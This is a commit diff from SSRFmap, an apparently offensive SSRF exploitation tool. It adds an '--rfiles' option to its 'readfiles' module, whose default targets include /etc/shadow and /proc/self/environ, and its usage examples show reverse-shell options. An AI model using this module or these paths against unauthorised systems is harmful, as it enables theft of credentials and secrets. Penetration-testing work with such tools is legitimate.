Merge pull request #35 from ScarletTeam/master
Allows readfiles module to read specific files specified in a parameter when starting the ssrfmap.py scriptpull/41/head
commit
c7922ba0ab
|
@ -1,6 +1,7 @@
|
||||||
from core.utils import *
|
from core.utils import *
|
||||||
import logging
|
import logging
|
||||||
import os
|
import os
|
||||||
|
from argparse import ArgumentParser
|
||||||
|
|
||||||
name = "readfiles"
|
name = "readfiles"
|
||||||
description = "Read files from the target"
|
description = "Read files from the target"
|
||||||
|
@ -8,12 +9,13 @@ author = "Swissky"
|
||||||
documentation = []
|
documentation = []
|
||||||
|
|
||||||
class exploit():
|
class exploit():
|
||||||
files = ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]
|
|
||||||
|
|
||||||
def __init__(self, requester, args):
|
def __init__(self, requester, args):
|
||||||
logging.info("Module '{}' launched !".format(name))
|
logging.info("Module '{}' launched !".format(name))
|
||||||
|
self.files = args.targetfiles.split(',') if args.targetfiles != None else ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]
|
||||||
|
|
||||||
r = requester.do_request(args.param, "")
|
r = requester.do_request(args.param, "")
|
||||||
|
|
||||||
if r != None:
|
if r != None:
|
||||||
default = r.text
|
default = r.text
|
||||||
|
|
||||||
|
@ -36,3 +38,6 @@ class exploit():
|
||||||
logging.info("\033[32mWriting file\033[0m : {} to {}".format(f, directory + "/" + filename))
|
logging.info("\033[32mWriting file\033[0m : {} to {}".format(f, directory + "/" + filename))
|
||||||
with open(directory + "/" + filename, 'w') as f:
|
with open(directory + "/" + filename, 'w') as f:
|
||||||
f.write(diff)
|
f.write(diff)
|
||||||
|
|
||||||
|
else:
|
||||||
|
print("Empty response")
|
||||||
|
|
|
@ -23,6 +23,7 @@ def parse_args():
|
||||||
python ssrfmap.py -r data/request.txt -p url -m redis
|
python ssrfmap.py -r data/request.txt -p url -m redis
|
||||||
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
|
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
|
||||||
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
|
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
|
||||||
|
python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles
|
||||||
'''
|
'''
|
||||||
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
|
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
|
||||||
parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
|
parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
|
||||||
|
@ -32,6 +33,7 @@ def parse_args():
|
||||||
parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
|
parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
|
||||||
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell")
|
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell")
|
||||||
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell")
|
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell")
|
||||||
|
parser.add_argument('--rfiles', action ='store', dest='targetfiles', help="Files to read with readfiles module", nargs='?', const=True)
|
||||||
parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
|
parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
|
||||||
parser.add_argument('--ssl', action ='store', dest='ssl', help="Use HTTPS without verification", nargs='?', const=True)
|
parser.add_argument('--ssl', action ='store', dest='ssl', help="Use HTTPS without verification", nargs='?', const=True)
|
||||||
parser.add_argument('--level', action ='store', dest='level', help="Level of test to perform (1-5, default: 1)", nargs='?', const=1, default=1, type=int)
|
parser.add_argument('--level', action ='store', dest='level', help="Level of test to perform (1-5, default: 1)", nargs='?', const=1, default=1, type=int)
|
||||||
|
|
Loading…
Reference in New Issue